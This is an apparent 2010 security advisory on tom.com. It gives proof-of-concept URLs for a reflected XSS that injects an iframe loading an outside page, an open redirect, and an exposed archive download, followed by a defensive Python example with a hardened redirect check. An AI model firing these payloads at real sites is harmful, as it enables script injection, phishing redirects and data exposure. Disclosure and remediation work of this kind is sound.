Tom.com main site XSS (cross-site scripting) vulnerability - Vulnerability Warning - Black Bar Safety Net (黑吧安全网)

2010-06-21T00:00:00
ID MYHACK58:62201027307
Type myhack58
Reporter Anonymous (佚名)
Modified 2010-06-21T00:00:00

Description

Test code:

http://www.tom.com/logout.php?backurl='"><iframe%20src=http://www.tjaote.com/blog/IMAGE/COMMON/qing.htm%20type="text/javascript"></iframe><"

Then a URL redirect (the goto parameter is followed without any check on the target host, so it can point to an external site):

poc:http://pass.tom.com/logout.php?goto=http://hi.baidu.com/5427518
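The two logout.php issues above (the unescaped backurl reflected into the page, and the unchecked goto redirect) both come from trusting a caller-supplied URL. The following is an added example, not code from the advisory or from tom.com: it models a vulnerable handler for each parameter next to a hardened one that validates the target against an allowlist before HTML-escaping it. The allowlisted hostnames, the markup and the fallback path are assumptions made for illustration; the advisory's own payload and redirect target are used as the sample inputs.

```python
"""Added example (not from the original advisory): how the two tom.com
logout.php flaws arise and how to close them.

Assumed for illustration: the allowlist of redirect hosts, the markup of
the logout page and the default fallback path. The real tom.com code is
not available; these handlers only reproduce the behaviour the PoCs imply.
"""
import html
from urllib.parse import urlsplit

# The payload published in the advisory, URL-decoded (%20 -> space).
ADVISORY_XSS_PAYLOAD = ('\'"><iframe src=http://www.tjaote.com/blog/IMAGE/COMMON/qing.htm'
                        ' type="text/javascript"></iframe><"')
# The redirect target published in the advisory.
ADVISORY_REDIRECT = "http://hi.baidu.com/5427518"

# Assumption: only these hosts may be redirect / back-link targets.
ALLOWED_REDIRECT_HOSTS = {"www.tom.com", "pass.tom.com"}
DEFAULT_TARGET = "/"


def vulnerable_logout_page(backurl: str) -> str:
    """Reflects backurl straight into an href attribute, as the XSS PoC implies.
    The leading '" closes the attribute and tag, so the <iframe> is rendered."""
    return '<p>Logged out. <a href="%s">Return</a></p>' % backurl


def vulnerable_redirect(goto: str) -> str:
    """Builds a Location header from the untrusted goto parameter as-is."""
    return "Location: " + goto


def safe_redirect_target(candidate: str) -> str:
    """Return candidate only if it is a site-relative path or an http(s) URL
    whose host is allowlisted; otherwise fall back to DEFAULT_TARGET."""
    if not candidate:
        return DEFAULT_TARGET
    parts = urlsplit(candidate)
    if parts.scheme == "" and parts.netloc == "":
        # Relative reference: accept "/path" but reject protocol-relative
        # "//host" and the "/\host" form some browsers normalise to "//".
        if candidate.startswith("/") and not candidate.startswith(("//", "/\\")):
            return candidate
        return DEFAULT_TARGET
    # parts.hostname is the parsed host, so "http://www.tom.com@evil/" is
    # judged by "evil", not by the userinfo before the "@".
    if parts.scheme in ("http", "https") and parts.hostname in ALLOWED_REDIRECT_HOSTS:
        return candidate
    return DEFAULT_TARGET


def hardened_logout_page(backurl: str) -> str:
    """Validate the target first, then escape it for the attribute context."""
    target = safe_redirect_target(backurl)
    return '<p>Logged out. <a href="%s">Return</a></p>' % html.escape(target, quote=True)


def hardened_redirect(goto: str) -> str:
    """Only allowlisted or site-relative targets reach the Location header."""
    return "Location: " + safe_redirect_target(goto)


def contains_injected_tag(markup: str) -> bool:
    """Demo check: did the attacker-controlled <iframe> survive into the page?"""
    return "<iframe" in markup.lower()


if __name__ == "__main__":
    print(vulnerable_logout_page(ADVISORY_XSS_PAYLOAD))
    print(hardened_logout_page(ADVISORY_XSS_PAYLOAD))
    print(vulnerable_redirect(ADVISORY_REDIRECT))
    print(hardened_redirect(ADVISORY_REDIRECT))
```

Validation is done before escaping on purpose: escaping alone would stop the iframe injection but still let `backurl` point the "Return" link at an arbitrary external site, which is the same open-redirect problem the `goto` PoC demonstrates.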

A file disclosure as well, of limited use (a downloadable archive):

poc:http://club.uhoop.tom.com/ucenter.tar.gz